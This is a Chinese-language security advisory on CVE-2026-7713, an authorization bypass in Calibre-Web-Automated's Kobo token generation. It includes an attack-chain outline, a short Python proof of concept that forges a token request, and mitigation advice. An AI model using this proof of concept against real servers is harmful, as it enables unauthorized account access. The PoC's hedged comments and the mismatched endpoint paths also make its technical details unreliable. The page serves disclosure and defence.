IPBUF安全漏洞报告
English
CVE-2026-7713 CVSS 6.3 中危

CVE-2026-7713: Calibre-Web-Automated权限绕过漏洞

披露日期: 2026-05-04

漏洞信息

漏洞编号
CVE-2026-7713
漏洞类型
权限绕过
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
crocodilestick Calibre-Web-Automated

相关标签

权限绕过Calibre-Web-AutomatedCVE-2026-7713认证绕过不当授权

漏洞概述

该漏洞存在于crocodilestick Calibre-Web-Automated软件4.0.6及之前的版本中。受影响的组件是Kobo auth-token路由,具体涉及文件cps/kobo_auth.py中的generate_auth_token函数。由于该函数存在不当授权问题,攻击者无需用户交互,仅需低权限即可通过网络远程发起攻击。利用此漏洞可能导致系统的机密性、完整性和可用性受到低程度的影响。目前该漏洞的利用代码已公开,建议用户尽快升级到4.0.7版本以修复此问题。

技术细节

该漏洞源于Calibre-Web-Automated项目中处理Kobo设备认证令牌生成时的逻辑缺陷。具体而言,在文件cps/kobo_auth.py的generate_auth_token函数中,程序未能正确验证请求者的权限上下文或对令牌生成的参数进行严格校验,导致攻击者可以操纵输入数据以绕过正常的授权检查。由于系统未对网络请求的来源进行充分的身份验证,低权限攻击者可以利用此缺陷生成有效的认证令牌,进而获取未授权的访问权限。尽管CVSS评分显示影响程度为低,但该漏洞允许远程利用,且无需用户交互,这使得攻击链相对简单。攻击者可以通过构造特定的恶意请求发送至受影响端点,触发逻辑漏洞,从而破坏系统的访问控制策略,潜在地泄露敏感数据或修改配置。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在运行crocodilestick Calibre-Web-Automated 4.0.6或更早版本。
STEP 2
获取低权限账号
攻击者注册或获取一个普通的低权限用户账号(PR:L要求)。
STEP 3
发送恶意请求
攻击者向/kobo_auth/generate_auth_token端点发送特制的请求,利用generate_auth_token函数中的逻辑缺陷。
STEP 4
绕过授权
由于系统存在不当授权,攻击者成功生成认证令牌,绕过了原本的安全检查。
STEP 5
执行未授权操作
利用获取的令牌,攻击者读取、修改数据或影响服务可用性(C:L/I:L/A:L)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the vulnerable endpoint target_url = "http://target-ip:port/kobo_auth/generate_auth_token" # Attacker's session (low privilege) session = requests.Session() # The vulnerability allows improper authorization # By sending a request to generate a token, the system might fail checks payload = { "user_id": "target_user", # Manipulating user context if possible "device_id": "attacker_device" } try: # Send the request to generate token response = session.post(target_url, data=payload) if response.status_code == 200: print("[+] Exploit successful! Token generated:") print(response.text) else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")

影响范围

crocodilestick Calibre-Web-Automated <= 4.0.6

防御指南

临时缓解措施
如果无法立即升级,建议限制对Kobo认证路由(/kobo/...)的网络访问,仅允许可信的IP地址或内网访问。同时,应加强对用户权限的审计,监控异常的令牌生成请求,以检测潜在的攻击行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表